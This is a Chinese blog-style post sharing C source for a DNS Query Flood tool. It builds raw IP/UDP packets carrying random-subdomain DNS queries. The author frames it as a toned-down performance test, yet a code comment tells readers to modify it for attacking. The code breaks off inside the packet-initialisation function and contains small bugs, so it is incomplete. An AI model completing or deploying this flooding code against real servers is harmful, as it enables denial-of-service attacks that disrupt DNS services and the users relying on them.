DNS Query Flood攻击
2011年写的一个DNS Query Flood测试代码。我已经尽可能的降低了攻击性,供测试DNS服务器性能使用。BTW,我依旧记得当时的痛苦,也许DNS协议的设计者是写第一个DNS服务器的人吧,协议中处处都在为Server端的解析方便考虑,易做图 DNS Protocol。// code by yunshu(wustyunshu@hotmail.com, 2011-07-11. just for test, have fun.// you should change some codes for attacking.#include <stdio.h>#include <netinet/in.h>#include <netdb.h>#include <sys/time.h>#include <sys/types.h>#include <unistd.h>#include <stdlib.h>#include <signal.h>#include <pthread.h>#include <errno.h>typedef struct ip_hdr{unsigned char h_verlen;unsigned char tos;unsigned short total_len;unsigned short ident;unsigned short frag_and_flags;unsigned char ttl;unsigned char proto;unsigned short checksum;unsigned int sourceIP;unsigned int destIP;}IP_HEADER;typedef struct udp_hdr{unsigned short uh_sport;unsigned short uh_dport;unsigned short uh_length;unsigned short uh_checksum;}UDP_HEADER;typedef struct usd_hdr{unsigned long saddr;unsigned long daddr;char mbz;char ptcl;unsigned short udpl;}USD_HEADER;typedef struct dns{unsigned short tid;unsigned short flags;unsigned short queries;unsigned short answers;unsigned short auth;unsigned short additional;}DNS_HEADER;typedef struct query{char * name;unsigned short type;unsigned short class;}QUERY_HEADER;int const HOST_LENGTH = 3;unsigned long long sleeptime, starttime, outcount = 0;int pkt_then_sleep = 0;unsigned short CheckSum(unsigned short * buffer, int size){unsigned long cksum = 0;while (size > 1){cksum += *buffer++;size -= sizeof(unsigned short);}if (size){cksum += *(unsigned char *) buffer;}cksum = (cksum >> 16) + (cksum & 0xffff);cksum += (cksum >> 16);return (unsigned short) (~cksum);}void MySleep(unsigned int micro_second){struct timeval t_timeval;t_timeval.tv_sec = 0;t_timeval.tv_usec = micro_second;select( 0, NULL, NULL, NULL, &t_timeval );}void PaddingQuery( char *buffer, char *base_name ){char *tmp = (char *)malloc(strlen(base_name)+HOST_LENGTH+1);if( NULL == tmp ){fprintf( stderr, "malloc for query error: %s\n", strerror(errno) );exit -1;}memset( tmp, 0, strlen(base_name)+HOST_LENGTH+1 );sprintf( tmp, "%c%c%c%s", rand()%25+97, rand()%25+97, rand()%25+97, base_name );int length_pos = 0;int loop_num = 1;char *token = strtok( tmp, "." );while( NULL != token ){if( loop_num == 1 ){length_pos = 0;memset( buffer, strlen(token), 1 );strcpy( buffer+length_pos+1, token );length_pos = length_pos + strlen(token) + 1;}else{memset( buffer+length_pos, strlen(token), 1 );strcpy( buffer+length_pos+1, token );length_pos = length_pos + strlen(token) + 1;}token = strtok( NULL, "." );loop_num ++;}free(tmp);}void Init( char *buffer, int buffer_size, char *ip, char *base_name ){IP_HEADER IpHeader;UDP_HEADER UdpHeader;USD_HEADER UsdHeader;DNS_HEADER DnsHeader;QUERY_HEADER QueryHeader;// whole udp packet except ip header and usd_headerint total_packet_len = buffer_size;// udp packet with usd_headerint udp_with_usd_len = total_packet_len - sizeof(IP_HEADER) + sizeof(USD_HEADER);char *udp_packet = (char *)malloc( udp_with_usd_len );if( NULL == udp_packet ){fprintf( stderr, "malloc udp packet error: %s\n", strerror(errno) );exit;}memset( udp_packet, 0, udp_with_usd_len );IpHeader.h_verlen = (4<<4 | sizeof(IpHeader)/sizeof(unsigned int));补充:综合编程 , 安全编程 ,上一个:python实现DES加密
下一个:PHP安全编程:记住登录状态的安全做法
